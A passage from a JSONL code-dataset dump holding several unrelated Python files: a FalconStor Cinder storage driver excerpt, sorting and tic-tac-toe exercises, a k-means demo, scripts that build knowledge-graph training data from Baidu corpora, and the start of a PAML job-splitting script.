vid):\n finished = False\n output = self.get_timemark_copy_status(vid)\n if output['timemarkoperationstatus']:\n timemark_status = output['timemarkoperationstatus']\n if timemark_status['operation'] == \"copy\":\n if timemark_status['status'] == 'completed':\n finished = True\n return finished\n\n def _check_tm_copy_finished(self, vid, timeout):\n finished = False\n starttime = time.time()\n while True:\n self._random_sleep()\n if time.time() > starttime + timeout:\n msg = (_('FSS get timemark copy timeout on vid: %s') % vid)\n raise exception.VolumeBackendAPIException(data=msg)\n elif self._check_tm_copy_status(vid):\n finished = True\n return finished\n\n #\n # TimeView methods\n #\n\n def create_timeview(self, tv_vid, params):\n vid = ''\n volume_metadata = {}\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_TIMEVIEW, tv_vid)\n output = self._fss_request(POST, url, params)\n if output and output['rc'] == 0:\n if output['copyid'] == -1:\n vid = output['id']\n else:\n vid = output['copyid']\n volume_metadata['FSS-vid'] = vid\n return volume_metadata\n\n #\n # Mirror methods\n #\n\n def create_mirror(self, vid, pool_id):\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_MIRROR, vid)\n params = dict(\n category='virtual',\n selectioncriteria='anydrive',\n mirrortarget=\"virtual\"\n )\n params.update(pool_id)\n return self._fss_request(POST, url, params)\n\n def get_mirror_sync_status(self, vid):\n url = '%s/%s/%s?type=syncstatus' % (\n FSS_LOGICALRESOURCE, FSS_MIRROR, vid)\n return self._fss_request(GET, url)\n\n def _check_mirror_sync_status(self, vid):\n finished = False\n output = self.get_mirror_sync_status(vid)\n if output['mirrorsyncstatus']:\n mirrorsyncstatus = output['mirrorsyncstatus']\n if mirrorsyncstatus['status'] == \"insync\":\n if mirrorsyncstatus['percentage'] == 0:\n finished = True\n return finished\n\n def _set_mirror(self, vid, **kwargs):\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_MIRROR, vid)\n return self._fss_request(PUT, url, kwargs)\n\n def sync_mirror(self, vid):\n return self._set_mirror(vid, action='sync')\n\n def promote_mirror(self, vid, new_volume_name):\n return self._set_mirror(vid, action='promote', name=new_volume_name)\n\n #\n # Host management methods\n #\n\n def get_server_options(self):\n url = '%s/%s' % (FSS_SERVER, FSS_OPTIONS)\n return self._fss_request(GET, url)\n\n def set_server_options(self, action):\n url = '%s/%s' % (FSS_SERVER, FSS_OPTIONS)\n params = dict(\n action=action,\n enabled=True\n )\n return self._fss_request(PUT, url, params)\n\n def get_server_name(self):\n url = '%s/%s' % (FSS_SERVER, FSS_OPTIONS)\n return self._fss_request(GET, url)\n\n #\n # SAN Client management methods\n #\n\n def list_client_initiators(self):\n url = '%s/%s/%s' % (FSS_CLIENT, FSS_SANCLIENT,\n FSS_ISCSI_CLIENT_INITIATORS)\n return self._fss_request(GET, url)\n\n def get_default_portal(self):\n url = '%s/%s/%s' % (FSS_SERVER, FSS_OPTIONS, FSS_PORTAL)\n return self._fss_request(GET, url)\n\n def create_client(self, params):\n url = '%s/%s' % (FSS_CLIENT, FSS_SANCLIENT)\n return self._fss_request(POST, url, params)\n\n def list_sanclient_info(self, client_id=None):\n url = '%s/%s' % (FSS_CLIENT, FSS_SANCLIENT)\n if client_id is not None:\n url = '%s/%s/%s' % (FSS_CLIENT, FSS_SANCLIENT,\n client_id)\n return self._fss_request(GET, url)\n\n def assign_vdev(self, client_id, params):\n url = '%s/%s/%s' % (FSS_CLIENT, FSS_SANCLIENT, client_id)\n return self._fss_request(PUT, url, params)\n\n def unassign_vdev(self, client_id, params):\n url = '%s/%s/%s' % (FSS_CLIENT, FSS_SANCLIENT, client_id)\n return self._fss_request(PUT, url, params)\n\n def _get_iscsi_target_info(self, client_id, vid):\n lun = 0\n target_name = None\n output = self.list_sanclient_info(client_id)\n\n if 'data' not in output:\n msg = _('No target information in given data.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n if 'iscsidevices' not in output['data']:\n msg = _('No iscsidevices information in given data.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n for iscsidevices in output['data']['iscsidevices']:\n if int(vid) == int(iscsidevices['id']):\n lun = iscsidevices['lun']\n iscsitarget_info = iscsidevices['iscsitarget']\n for key, value in iscsitarget_info.items():\n if key == 'name':\n target_name = value\n\n return lun, target_name\n\n def _check_host_mapping_status(self, client_id, target_id):\n is_empty = False\n hosting_cnt = 0\n output = self.list_sanclient_info(client_id)\n if 'data' not in output:\n msg = _('No target in given data.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n if 'iscsidevices' not in output['data']:\n msg = _('No iscsidevices information in given data.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n if len(output['data']['iscsidevices']) == 0:\n is_empty = True\n else:\n for iscsidevices in output['data']['iscsidevices']:\n iscsitarget_info = iscsidevices['iscsitarget']\n for key, value in iscsitarget_info.items():\n if key == 'id' and target_id == value:\n hosting_cnt += 1\n\n if hosting_cnt == 0:\n is_empty = True\n return is_empty\n\n def list_iscsi_target_info(self, target_id=None):\n url = '%s/%s' % (FSS_CLIENT, FSS_ISCSI_TARGET)\n if target_id is not None:\n url = '%s/%s/%s' % (FSS_CLIENT, FSS_ISCSI_TARGET,\n target_id)\n return self._fss_request(GET, url)\n\n def _get_iscsi_target_id(self, initiator_iqn):\n target_id = ''\n client_id = ''\n output = self.list_iscsi_target_info()\n\n if 'data' not in output:\n msg = _('No target in given data.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n if 'iscsitargets' not in output['data']:\n msg = _('No iscsitargets for target.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n for targets in output['data']['iscsitargets']:\n if 'name' in targets:\n if initiator_iqn in targets['name']:\n target_id = str(targets['id'])\n client_id = str(targets['clientid'])\n break\n return target_id, client_id\n\n def create_iscsitarget(self, params):\n url = '%s/%s' % (FSS_CLIENT, FSS_ISCSI_TARGET)\n return self._fss_request(POST, url, params)\n\n def delete_iscsi_target(self, target_id):\n url = '%s/%s/%s' % (FSS_CLIENT, FSS_ISCSI_TARGET, target_id)\n params = dict(\n force=True\n )\n return self._fss_request(DELETE, url, params)\n\n def delete_client(self, client_id):\n url = '%s/%s/%s' % (FSS_CLIENT, FSS_SANCLIENT, client_id)\n return self._fss_request(DELETE, url)\n\n def _get_fc_client_info(self, client_id, vid):\n lun = 0\n output = self.list_sanclient_info(client_id)\n if 'data' not in output:\n msg = _('No target information in given data.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n if 'fcdevices' not in output['data']:\n msg = _('No fcdevices information in given data.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n for fcdevices in output['data']['fcdevices']:\n if int(vid) == int(fcdevices['id']):\n lun = fcdevices['lun']\n\n return lun\n\n #\n # Group related methods\n #\n\n def create_group(self, params):\n url = '%s/%s' % (FSS_LOGICALRESOURCE, FSS_SNAPSHOT_GROUP)\n return self._fss_request(POST, url, params)\n\n def list_group_info(self, gid=None):\n if gid is not None:\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_SNAPSHOT_GROUP, gid)\n else:\n url = '%s/%s' % (FSS_LOGICALRESOURCE, FSS_SNAPSHOT_GROUP)\n return self._fss_request(GET, url)\n\n def set_group(self, gid, join_params=None, leave_params=None):\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_SNAPSHOT_GROUP, gid)\n if join_params:\n self._fss_request(PUT, url, join_params)\n if leave_params:\n self._fss_request(PUT, url, leave_params)\n\n def create_group_timemark_policy(self, gid, params):\n url = '%s/%s/%s/%s' % (FSS_LOGICALRESOURCE,\n FSS_SNAPSHOT_GROUP, FSS_TIMEMARKPOLICY, gid)\n return self._fss_request(POST, url, params)\n\n def _check_if_group_tm_enabled(self, gid):\n timemarkenabled = False\n output = self.list_group_info(gid)\n if \"timemarkenabled\" in output['data']:\n timemarkenabled = output['data']['timemarkenabled']\n return timemarkenabled\n\n def create_group_timemark(self, gid, params):\n url = '%s/%s/%s/%s' % (FSS_LOGICALRESOURCE,\n FSS_SNAPSHOT_GROUP, FSS_TIMEMARK, gid)\n return self._fss_request(POST, url, params)\n\n def get_group_timemark(self, gid):\n url = '%s/%s/%s/%s' % (FSS_LOGICALRESOURCE,\n FSS_SNAPSHOT_GROUP, FSS_TIMEMARK, gid)\n return self._fss_request(GET, url)\n\n def delete_group_timemark(self, timestamp, params):\n url = '%s/%s/%s/%s' % (FSS_LOGICALRESOURCE,\n FSS_SNAPSHOT_GROUP, FSS_TIMEMARK, timestamp)\n return self._fss_request(DELETE, url, params)\n\n def delete_group_timemark_policy(self, gid):\n url = '%s/%s/%s/%s' % (FSS_LOGICALRESOURCE,\n FSS_SNAPSHOT_GROUP, FSS_TIMEMARKPOLICY, gid)\n return self._fss_request(DELETE, url)\n\n def delete_snapshot_group(self, gid):\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_SNAPSHOT_GROUP, gid)\n return self._fss_request(DELETE, url)\n\n def destroy_group(self, gid):\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_SNAPSHOT_GROUP, gid)\n return self._fss_request(DELETE, url)\n\n def get_fss_error_code(self, err_id):\n try:\n url = '%s/%s/%s' % (FSS_SERVER, FSS_RETURN_CODE, err_id)\n output = self._fss_request(GET, url)\n if output['rc'] == 0:\n return output\n except Exception:\n msg = (_('Can not find this error code:%s.') % err_id)\n raise exception.APIException(reason=msg)\n\n\nclass FSSHTTPError(Exception):\n\n def __init__(self, target, response):\n super(FSSHTTPError, self).__init__()\n self.target = target\n self.code = response['code']\n self.text = response['text']\n self.reason = response['reason']\n\n def __str__(self):\n msg = (\"FSSHTTPError code {0} returned by REST at {1}: {2}\\n{3}\")\n return msg.format(self.code, self.target,\n self.reason, self.text)\n","sub_path":"cinder/volume/drivers/falconstor/rest_proxy.py","file_name":"rest_proxy.py","file_ext":"py","file_size_in_byte":58141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"418154304","text":"\"\"\"\n******************************************************************************\n* Purpose: Take int input from user and sort using Bubble sort.\n*\n* @author: Pushkar Ishware\n* @version: 3.7\n* @since: 26-12-2018\n*\n******************************************************************************\n\"\"\"\nfrom Utilities import utilities\nfrom Utilities.utilities import util # new\n\nu = util()\n\n\ndef BubbleSort():\n try:\n data = list(input(\"Enter (INT)elements separated by spaces\").split(\" \"))\n data = [int(x) for x in data]\n u.BubbleSort_User(data)\n\n\n except ValueError:\n print(\"String value given in int list\")\n\n\nif __name__ == \"__main__\":\n BubbleSort()\n","sub_path":"BridgeLabz_Python/Functional/A8_BubbleSort.py","file_name":"A8_BubbleSort.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"411722283","text":"#tictactoe by David Al-Yakobi\n#07/28/2019\n\nimport random\nfrom os import system, name\n\n#function to clear() screen easily later on \ndef clear():\n\tif name == 'nt': #if windows, clear cmd prompt\n\t\t_= system('cls')\n\telse: #if linux or mac, clear terminal\n\t\t_= system('clear')\n\n#function to display board with string concatination\ndef display_board(board):\n print(' ' + board[0] + ' '*3 + '|' + ' '*3 +board[1] +' '*3 + '|' +' '*3 +board[2])\n print('-'*20)\n print(' ' + board[3] + ' '*3 + '|' + ' '*3 +board[4] +' '*3 + '|' +' '*3 +board[5])\n print('-'*20)\n print(' ' + board[6] + ' '*3 + '|' + ' '*3 +board[7] +' '*3 + '|' +' '*3 +board[8])\n \n'''testing display_board() ''' \n#test_board = ['X','X','O','X','O','X','O','X','O','X']\n#display_board(test_board)\n\n#get player input function\ndef player_input():\n while True:\n user_input = input('Would you like to be X or O: ').upper()\n if user_input == 'X':\n return ('X','O')\n elif user_input == 'O':\n return ('O','X')\n else:\n print('\\nPlease Enter: X or O\\n')\n\n'''testing player_input()'''\n#player_input()\n\n#function to place marker on board\ndef place_marker(board, marker, position):\n board[position] = marker\n\n'''testing marker placement'''\n#place_marker(testBoard,'X',2)\n#display_board(testBoard)\n\n#function to check all possible winning senarios\ndef win_check(board, mark):\n return (board[0] == board[1] == board[2] == mark or \n \tboard[3] == board[4] == board[5] == mark or \n \tboard[6] == board[7] == board[8] == mark or \n \tboard[0] == board[3] == board[6] == mark or \n \tboard[1] == board[4] == board[7] == mark or \n \tboard[2] == board[5] == board[8] == mark or \n \tboard[0] == board[4] == board[8] == mark or \n \tboard[2] == board[4] == board[6] == mark)\n\n'''win check'''\n#win_check(testBoard,('X'))\n\n#function that returns a tulip with (player going first, player going second) \ndef choose_first():\n flip = random.randint(0,1)\n if flip == 0:\n return 'Player 1','Player 2'\n else:\n return 'Player 2', 'Player 1'\n\n#function that returns true if space on board is not occupied \ndef space_check(board, position):\n return not(board[position] == 'X' or board[position] == 'O')\n\n#function that checks if any positions on board are empty then return falls \n#*uses space_check function to check if board is full\ndef full_board_check(board):\n for position in range(9):\n if space_check(board,position):\n return False\n return True\n\n#function that takes user input and places marker\n#*also has to check if space is free at that possition*\ndef player_choice(board):\n code = ['1','2','3','4','5','6','7','8','9']\n while True:\n userInput = input('Enter a position(1-9): ')\n if userInput in code:\n if space_check(board, int(userInput)-1):\n return (int(userInput)-1)\n print('position is not available')\n\n#function that asks user if he/she would like to play again\ndef replay():\n while True:\n userInput = input('do you want to play again?(Y or N): ')\n if userInput.upper() == 'Y':\n return True\n elif userInput.upper() == 'N':\n return False\n\n#MAIN \n#*GAME START*\nwhile True:\t\n clear()\n print('Welcome to Tic Tac Toe!\\n')\n board = ['1','2','3','4','5','6','7','8','9']\n print('Board positions look as follows use this to enter a marker:')\n display_board(board)\n firstPlayer = choose_first()\n print(f'\\n{firstPlayer[0]} goes first, goodluck!\\n')\n marker = player_input() # returns tulip (player1 marker , player2 marker)\n\n '''use code below to remove board numbers in game'''\n #board = [' ',' ',' ',' ',' ',' ',' ',' ',' ']\n \n #while game is active \n while True:\n clear()\n #First players turn.\n #show players turn\n print(f'{firstPlayer[0]}:')\n #display the board\n display_board(board)\n #ask player where to place marker\n place_marker(board, marker[0], player_choice(board))\n #check if player won or if board is full, else continue to next player\n if win_check(board, marker[0]):\n clear()\n display_board(board)\n print(f'\\n{firstPlayer[0]} wins!!'*3)\n break \n #only first player can fill board so theres no need to check if board is full for second player\n elif full_board_check(board):\n clear()\n print(' O_O '* 3)\n display_board(board)\n print(\"\\nIt's a tie!\\n\")\n break \n #Second players turn.\n clear()\n #show players turn\n print(f'{firstPlayer[1]}:')\n #display board\n display_board(board)\n #ask player where to place marker\n place_marker(board, marker[1], player_choice(board))\n #check if player won, else not continue looping\n if win_check(board, marker[1]):\n clear()\n display_board(board)\n print(f'\\n{firstPlayer[1]} wins!!'*3)\n break\n \n #ask players if they would like to play again\n if not replay():\n break\n\n\n ","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":5155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"592699102","text":"def read_data(file, converter=None):\n with open(file) as f:\n data = f.read().strip().split('\\n')\n if converter is not None:\n converted = []\n for d in data:\n converted.append(converter(d))\n data = converted\n return data\n\n","sub_path":"2020/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"349991080","text":"# 2차원 좌표 정렬하기 문제\n\nn = int(input()) # 원소의 개수를 입력받습니다.\narray = [] # 배열을 선언합니다.\n\nfor i in range(n):\n x, y = map(int, input().split())\n array.append((x, y)) #정수 두 개로 이루어진 배열로 초기화하고, 원소를 하나씩 입력받습니다.\n\n# sorting 같은 경우 보통 key function을 설정해준다. 2차원 좌표 정렬 문제의 경우 y와 x의 자리를 바꿔 \n# y값부터 정렬될 수 있도록 작성하였다.\n# 예를 들어 제곱수를 크기를 기준으로 soring하고 싶다면 array.sort(key=lambda x : x*x)\narray.sort(key=lambda x : (x[1], x[0])) \n\nfor x, y in array:\n print(x, y)","sub_path":"3주차/노하람/(정렬)난 올라가는게 좋아.py","file_name":"(정렬)난 올라가는게 좋아.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"87013683","text":"from numpy import random, array\nfrom sklearn.cluster import KMeans\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import scale\nfrom numpy import random, float\n\n## First we create some fake data with k clusters and N people\n\ndef createClusteredData(N,k):\n #random.seed(10)\n pointsPerCluster = float(N/k)\n X=[]\n for i in range (k):\n #for each k define a centroid according to a uniform distribution\n incomeCentroid = random.uniform(20000.0, 200000.0)\n ageCentroid = random.uniform(20.0,70.0)\n for j in range(int(pointsPerCluster)):\n #around each centroid define a cloud of normally distributed points\n X.append([random.normal(incomeCentroid,10000.0),random.normal(ageCentroid,2.0)])\n X = array(X)\n return X\n\ndata = createClusteredData(100, 5)\n\nmodel = KMeans(n_clusters=5)\n#insert scaled data into the kmeans model\nmodel = model.fit(scale(data))\nprint(model.labels_)\n\nplt.figure()\n# plt.scatter(data[:,0],data[:,1],c=models.labels_.astype(float))\nplt.scatter(data[:,0],data[:,1], c=model.labels_.astype(float))\nplt.show()\n\n\n\n\n ","sub_path":"python/sundog/kmeansclustering.py","file_name":"kmeansclustering.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"186551658","text":"# coding=utf-8\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom config import Config\nfrom model import BERT_LSTM_CRF\nimport torch.optim as optim\nfrom utils import load_vocab, read_corpus, load_model, save_model,Tjson\nfrom torch.utils.data import TensorDataset\nfrom torch.utils.data import DataLoader\nimport random\nfrom tqdm import tqdm\nimport os\n# import fire\nfrom random import shuffle\n\ndef build_dataset(train_file,type=\"all\"):\n \"\"\"\n 百度训练集\n train_file 文件路径\n type=\"all\" 或者mini \n mini\n \"\"\"\n tjson=Tjson(file_path=train_file)\n tjson_save=Tjson(file_path=\"data/train.json\")\n dev_json_save=Tjson(file_path=\"data/dev.json\")\n data=[]\n for item in tqdm(tjson.load()):\n \n text= item['text']\n # print(text)\n # print(item['spo_list'])\n predicate={}\n for n in item['spo_list']:\n predicate[n['predicate']]=[]\n for n in item['spo_list']:\n one={\n \"subject\":n['subject'],\"object\":n['object'],\n }\n predicate[n['predicate']].append(one)\n # print(predicate)\n p_n=list(range(20))\n # random.shuffle(p_n) \n label = [\"O\"]*len(text)\n for i,p in enumerate( predicate):\n # print('p',p)\n # print(predicate)\n # i=0\n i=0\n # for m in predicate[p]:\n # start_a =text.find(m['subject'])\n # end_a=text.find(m['subject'])+len(m['subject'])\n # for n in range(start_a,end_a):\n # # label[n]='M_A_'+str(p_n[i])\n # label[n]='M_A'\n # pass\n # start_a =text.find(m['object'])\n # end_a=text.find(m['object'])+len(m['object'])\n # for n in range(start_a,end_a):\n # # label[n]='M_B_'+str(p_n[i])\n # label[n]='M_A'\n # pass\n start_p =text.find(p)\n end_p=text.find(p)+len(p)\n if start_p>=0:\n for n in range(start_p,end_p):\n # label[n]='M_P_'+str(p_n[i])\n label[n]='M_P'\n pass\n # print(label)\n if len(list(text))==len(list(label)):\n one={\"text\":list(text), \"label\":label}\n data.append(one)\n else:\n # print(\"pass\")\n pass\n if type==\"all\":\n pass\n elif type==\"mini\":\n data=data[:200]\n\n f=int(len(data)*0.85)\n tjson_save.save(data=data[:f])\n dev_json_save.save(data=data[f:])\ndef auto_label(label,new):\n if label==\"O\":\n return new\n else:\n # return label+'_'+new\n return new\ndef mark_word_label(text,label_b,word,tp=\"实体\"):\n p=word\n start_p =text.find(p)\n end_p=text.find(p)+len(p)-1\n if start_p>=0:\n if len(p)>3:\n label_b[start_p]=auto_label(label_b[start_p],'B-'+tp)\n label_b[end_p]=auto_label(label_b[end_p],'E-'+tp)\n for n in range(start_p+1,end_p):\n label_b[n]=auto_label(label_b[n],'M-'+tp)\n pass\n elif len(p)==3:\n label_b[start_p]=auto_label(label_b[start_p],'B-'+tp)\n label_b[end_p]= auto_label(label_b[end_p],'E-'+tp)\n label_b[start_p+1]= auto_label(label_b[start_p+1],'M-'+tp)\n elif len(p)==1:\n label_b[start_p]=auto_label(label_b[start_p],'S-'+tp)\n elif len(p)==2:\n label_b[start_p]=auto_label(label_b[start_p],'B-'+tp)\n label_b[end_p]= auto_label(label_b[end_p],'E-'+tp)\n return label_b,start_p\n# def mark_one(text,kgs):\n# # root_label = [\"O\"]*len(text)\n# print(\"###\"*20)\n# print(text)\n# print(\"kgs\",kgs)\n# for ner in kgs.keys():\n# label= [\"O\"]*len(text)\n# label1=mark_word_label(text,label,ner,\"实体\")\n# print('word',ner,\"++++++++++++++++++++\")\n# for pword in kgs[ner]:\n# # kgs[ner][pword]['label']=label1 \n \n# # label1=kgs[ner][pword]['label']\n# # #标记关系\n# # label1=mark_word_label(text,label,ner,\"实体\")\n# label2=mark_word_label(text,label1,pword,\"关系\")\n# # print(label2)\n# # print('label1',label1)\n# # # print(\"---\"*10)\n# # print('label2',label2)\n# # kgs[ner][pword]['label']=label2\n# label3=label2\n# # print(\"-_-\"*10)\n# # print(\"kgs\",kgs)\n# for p in kgs[ner][pword]['objects']:\n# # 标记描述 \n# label3=mark_word_label(text,label3,p,\"描述\")\n# # print(ner,pword,kgs[ner][pword]['objects'])\n# kgs[ner][pword]['label']=label3\n# # print('label3',label3)\n# print(\"¥¥¥¥¥¥¥¥\"*20)\n# print(ner,pword,kgs[ner][pword])\n# # del label3\n# # del label2\n# print(kgs) \n\n\ndef build_dataset_kg(train_file,type=\"all\"):\n \"\"\"\n 百度训练集\n 转化为标注数据集\n train_file 文件路径\n type=\"all\" 或者mini \n mini\n\n 构建数据思路\n 多个描述合并到一个训练里\n\n 使用ner提取出句子中的实体\n\n 文本: ner+句子\n label: ['K']*len(ner)+正常标记\n \"\"\"\n tjson=Tjson(file_path=train_file)\n all_save=Tjson(file_path=\"data/train_all.json\")\n tjson_save=Tjson(file_path=\"data/train.json\")\n dev_json_save=Tjson(file_path=\"data/dev.json\")\n data=[]\n i=0\n for item in tqdm(tjson.load()):\n # i=i+1\n # if i==1000:\n # break\n # print(item)\n text= item['text']\n \n # print(text)\n # print(item['spo_list'])\n predicate={}\n for n in item['spo_list']:\n predicate[n['predicate']]=[]\n kgs={}\n # s_n=0\n for n in item['spo_list']:\n if kgs.get(n['subject'])==None:\n kgs[n['subject']]={}\n\n label= [\"O\"]*len(text)\n # w=n['subject']\n # label,s=mark_word_label(text,label,w,\"实体\")\n\n # w=n['predicate']\n # label,s=mark_word_label(text,label,w,\"关系\")\n\n w=n['object']\n label,s=mark_word_label(text,label,w,\"描述\")\n kgs[n['subject']][n['predicate']]={\"objects\":[n['object']],'label':label}\n elif kgs[n['subject']].get(n['predicate'])==None:\n\n label= [\"O\"]*len(text)\n # w=n['subject']\n # label,s=mark_word_label(text,label,w,\"实体\")\n\n # w=n['predicate']\n # label,s=mark_word_label(text,label,w,\"关系\")\n\n w=n['object']\n label,s=mark_word_label(text,label,w,\"描述\")\n kgs[n['subject']][n['predicate']]={\"objects\":[n['object']],'label':label}\n else:\n\n label= kgs[n['subject']][n['predicate']]['label']\n # w=n['subject']\n # label,s=mark_word_label(text,label,w,\"实体\")\n\n # w=n['predicate']\n # label,s=mark_word_label(text,label,w,\"关系\")\n\n w=n['object']\n label,s=mark_word_label(text,label,w,\"描述\")\n kgs[n['subject']][n['predicate']]['objects'].append(n['object'])\n # if s>=0:\n # s_n=s_n+1\n \n # mark_one(text,kgs)\n # print(kgs)\n for ner in kgs.keys():\n for p in kgs[ner]:\n # print('####'*20)\n # print(kgs[ner][p])\n # print(text)\n # print(kgs[ner][p]['label'])\n one={\"text\":list(ner+'#'+p+'#'+text),'label':len(ner)*['K']+['X']+len(p)*['P']+['X']+kgs[ner][p]['label']}\n if len(one['text'])==len(one['label']):\n data.append(one)\n if type==\"all\":\n pass\n elif type==\"mini\":\n data=data[:200]\n all_save.save(data)\n f=int(len(data)*0.85)\n tjson_save.save(data=data[:f])\n dev_json_save.save(data=data[f:])\n\n\n\n\ndef build_dataset_kg_check(train_file,type=\"all\"):\n \"\"\"\n 百度训练集转化为判断抽取知识是否是合理的\n \"\"\"\n tjson=Tjson(file_path=train_file)\n # all_save=Tjson(file_path=\"data/train_all.json\")\n tjson_save=Tjson(file_path=\"data/kg_check/train.json\")\n dev_json_save=Tjson(file_path=\"data/kg_check/dev.json\")\n data=[]\n i=0\n for item in tqdm(tjson.load()):\n for n in item['spo_list']:\n kg_one=[n['subject'],n['predicate'],n['object']]\n kg=' [KG] '+\",\".join(kg_one)+\" [/KG] \"+ item['text']\n one={\n 'sentence':kg,\n 'label':1\n }\n data.append(one)\n kg_one_list=list(\",\".join(kg_one))\n shuffle(kg_one_list)\n # print(kg_one_list)\n if kg_one_list != list(\",\".join(kg_one)):\n kg=' [KG] '+\"\".join(kg_one_list)+\" [/KG] \"+ item['text']\n one={\n 'sentence':kg,\n 'label':0\n }\n data.append(one)\n # print(data[10:])\n if type==\"all\":\n pass\n elif type==\"mini\":\n data=data[:200]\n # all_save.save(data)\n f=int(len(data)*0.85)\n tjson_save.save(data=data[:f])\n dev_json_save.save(data=data[f:])\n\n\n\ndef build_dataset_ner(train_file,type=\"all\"):\n \"\"\"\n 百度训练集\n 转化为标注数据集\n 实体标注和关系词抽取训练集\n train_file 文件路径\n type=\"all\" 或者mini \n mini\n\n 构建数据思路\n 多个描述合并到一个训练里\n\n 使用ner提取出句子中的实体\n\n 文本: ner+句子\n label: ['K']*len(ner)+正常标记\n \"\"\"\n tjson=Tjson(file_path=train_file)\n all_save=Tjson(file_path=\"data/train_all.json\")\n # tjson_save=Tjson(file_path=\"data/ner_train.json\")\n # dev_json_save=Tjson(file_path=\"data/ner_dev.json\")\n tjson_save=Tjson(file_path=\"data/ner_train.json\")\n dev_json_save=Tjson(file_path=\"data/ner_dev.json\")\n data=[]\n \n for item in tqdm(tjson.load()):\n text= item['text']\n label= [\"O\"]*len(text)\n ner={}\n for n in item['spo_list']:\n try:\n ner[n['subject']].append(n['predicate'])\n except:\n ner[n['subject']]=[n['predicate']]\n for nr in ner:\n s=0\n for n in ner[nr]:\n label,s1=mark_word_label(text,label,n,\"关系\")\n if s1>=0:\n s=s+1\n if s>0:\n one={'text':list(nr+'#'+text),'label':['K']*len(nr)+['X']+label}\n data.append(one)\n # print(one)\n\n if type==\"all\":\n pass\n elif type==\"mini\":\n data=data[:200]\n # all_save.save(data)\n print(\"总共数据\",len(data))\n f=int(len(data)*0.85)\n tjson_save.save(data=data[:f])\n dev_json_save.save(data=data[f:])\n\n\n\n\n\n\n\n\ndef build_dataset_gpt2(train_file,type=\"all\"):\n \"\"\"\n 百度训练集\n train_file 文件路径\n type=\"all\" 或者mini \n mini\n \"\"\"\n tjson=Tjson(file_path=train_file)\n tjson_save=Tjson(file_path=\"data/train.json\")\n dev_json_save=Tjson(file_path=\"data/dev.json\")\n data=[]\n f = open('data/gpt2kg.txt','a')\n for item in tqdm(tjson.load()):\n \n text= item['text']\n # print(text)\n # print(item['spo_list'])\n predicate={}\n kg=\" [KGS] \"\n for n in item['spo_list']:\n # predicate[n['predicate']]=[]\n # print(n)\n # print(n)\n kg=kg+' [KG] '+n['subject']+\",\"+n['predicate']+\",\"+n['object']+\" [/KG] \"\n\n\n pass\n \n # data=text+str(item['spo_list'])\n data=text+kg+\" [KGE] \"\n print(\"***\"*10)\n print(data)\n f.write(data+'\\n\\n')\n f.close()\n\n\nif __name__ == '__main__':\n # fire.Fire()\n train_files=[\"/mnt/data/dev/tdata/知识提取/train_data.json\",\"/mnt/data/dev/tdata/知识提取/dev_data.json\"]\n # train_file=\"data/ner_train.json\"\n # dev_file=\"data/ner_dev.json\"\n # train_file=\"data/train.json\"\n # dev_file=\"data/dev.json\"\n # if os.path.exists(train_file) or os.path.exists(dev_file):\n # print(\"文件已经存在\")\n # print(\"请手动删除\")\n # else:\n for f in train_files:\n # build_dataset(f,type=\"all\")\n ###构建知识提取训练集\n # build_dataset_kg(f,type=\"all\")\n\n #标记实体和关系词\n # build_dataset_ner(f,type=\"all\")\n # build_dataset_gpt2(f,type=\"mini\")\n build_dataset_kg_check(f,type=\"all\")\n\n\n\n\n\n\n\n\n\n\n","sub_path":"构建知识库训练集gpt2和bert.py","file_name":"构建知识库训练集gpt2和bert.py","file_ext":"py","file_size_in_byte":12672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"464635087","text":"#!/usr/bin/python3\n# hessian_splitter.py by josh\n\nimport sys\nimport re\nimport os\nimport string\nimport shutil\nimport subprocess\n\nlocusPattern = re.compile(\"^\\*\\*\\* Locus (\\d) \\*\\*\\*\")\n\nbasemlString = \"\"\"#!/bin/sh\n#$ -cwd # Use current working directory\n#$ -V # Verbose\n#$ -j y # Maximum output, inc errors\n#$ -r y # Condense error files into one\n#$ -l node_type=nxv\n#$ -l h_rt=240:0:0 # Request runtime (up to 240 hours)\n#$ -l h_vmem=4G # Request RAM per core\n#$ -m bea # Status emails\n\n/data/home/btw915/programs/login2/paml4.9e/bin/baseml tmp000{}.ctl\n\n\"\"\"\n\nlocusList = []\n\ninFile = open(\"out.txt\", \"r\")\n\nfor idx, line in enumerate(inFile):\n if \"Locus\" in line:\n if not locusPattern.match(line):\n print(line)\n sys.exit(\"Error, line not in expected format\")\n print(idx, line)\n locus = locusPattern.match(line).group(1)\n print(locus)\n locusList.append(locus)\n while not \"Printing out site pattern counts\" in line:\n line = 